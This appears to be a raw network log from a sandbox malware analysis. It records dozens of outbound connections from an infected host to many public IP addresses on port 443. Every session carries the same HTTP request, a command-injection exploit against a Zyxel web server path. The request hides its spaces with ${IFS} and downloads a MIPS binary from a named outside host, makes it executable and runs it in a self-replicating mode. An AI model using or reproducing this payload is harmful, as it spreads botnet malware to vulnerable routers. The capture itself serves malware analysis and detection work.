                                                Jan 28, 2024 10:16:15.666763067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2049192.168.2.2360984106.58.3.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666805983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2050192.168.2.2352416188.90.77.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666822910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2051192.168.2.235038264.241.98.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666822910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2052192.168.2.2335750178.193.124.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666838884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2053192.168.2.2338640142.215.223.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666870117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2054192.168.2.233390888.164.105.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666888952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2055192.168.2.234000670.10.161.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666924000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2056192.168.2.2357800107.243.19.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666956902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2057192.168.2.2335474111.77.244.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666965008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2058192.168.2.2354278153.53.62.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.666996956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2059192.168.2.233948471.238.124.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667032957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2060192.168.2.233655442.123.208.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667053938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2061192.168.2.234656445.228.173.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667066097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2062192.168.2.2335650144.97.143.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667088985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2063192.168.2.2352266191.127.177.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667128086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2064192.168.2.234976435.87.21.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667160988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2065192.168.2.2338504193.102.179.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667161942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2066192.168.2.234474618.128.221.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667188883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2067192.168.2.2347138216.199.206.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667229891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2068192.168.2.235621814.185.49.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667249918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2069192.168.2.235947450.215.5.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667270899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2070192.168.2.23608745.111.11.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667280912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2071192.168.2.2338496182.15.101.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667315960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2072192.168.2.233945664.46.92.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667362928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2073192.168.2.2351428210.253.182.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667382002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2074192.168.2.2355286126.84.11.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667397976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2075192.168.2.2335280101.1.222.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667444944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2076192.168.2.235811441.139.213.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667455912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2077192.168.2.234590463.137.123.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667488098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2078192.168.2.235872093.195.250.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667515039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2079192.168.2.234362853.123.105.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667550087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2080192.168.2.2348044213.80.2.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667572021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2081192.168.2.2346398169.84.131.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667608023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2082192.168.2.2339160151.212.19.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667619944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2083192.168.2.2345028101.42.220.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667668104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2084192.168.2.235938069.90.199.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667690039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2085192.168.2.2346380175.142.148.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667706013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2086192.168.2.2354060156.81.217.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.667732000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2087192.168.2.233719414.156.0.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670056105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2088192.168.2.2352586221.223.213.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670516968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2089192.168.2.2335164139.39.98.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670547009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2090192.168.2.2356736103.212.160.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670553923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2091192.168.2.233925627.154.102.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670605898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2092192.168.2.236014837.201.13.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670635939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2093192.168.2.2360828146.255.76.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670634985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2094192.168.2.2338064109.11.60.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670651913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2095192.168.2.2333560195.23.174.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670685053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2096192.168.2.2348180158.200.182.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670694113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2097192.168.2.234475485.55.5.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670715094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2098192.168.2.234479491.130.130.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670751095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2099192.168.2.2335348204.167.107.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670789003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2100192.168.2.2337100178.114.60.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670824051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2101192.168.2.234849290.48.176.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670860052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2102192.168.2.2351060165.24.166.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670883894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2103192.168.2.2343604189.3.111.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670916080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2104192.168.2.234447682.69.119.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670952082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2105192.168.2.2351256191.88.125.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:15.670974016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2106192.168.2.235039679.91.199.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.676820993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2107192.168.2.2354952158.34.236.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.676851034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2108192.168.2.235350468.39.100.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.676876068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2109192.168.2.2354656107.153.189.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:16.676882982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2110192.168.2.2359600162.240.172.148443
                                                TimestampBytes transferredDirectionData
